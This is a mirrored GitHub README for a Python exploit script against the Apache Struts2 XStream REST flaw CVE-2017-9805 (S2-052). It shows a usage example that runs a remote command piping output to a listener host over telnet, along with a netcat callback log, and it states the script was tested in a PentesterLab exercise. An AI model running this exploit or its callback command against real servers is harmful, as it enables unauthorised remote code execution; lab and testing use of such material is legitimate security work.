GithubHelp home page GithubHelp logo

-cve-2017-9805's Introduction

Vulnerability information

Resources: * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805

What is this?

A python exploit script capable of executing remote commands into the shell of a system hosting a Struts2 vulnerable to S2-052.

Usage

╭─root@blackshell ~/
╰─# python s2-052.py --target 'http://192.168.0.233/orders/3' --command "echo pwned | telnet 192.168.0.122 1234"

[*] Apache Struts XStream REST vulnerability - S2-052
[*] Creating payload ...
[*] Exploit packet has 2582 bytes.
[*] Sending exploit packet ...
[+] Exploit packet has been sent.

╭─zc00l@blackshell ~/
╰─$ nc -lvp 1234

listening on [any] 1234 ...
connect to [192.168.0.122] from vulnerable.lan [192.168.0.233] 55791
pwned

Tested on pentesterlab vulnerable machine of exercise s2-052.

Author rights

This exploit script was written by me (zc00l) and can be used by anyone.

In case you want to use or modify this script, please give the rightful credits for any work already done.

-cve-2017-9805's People

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.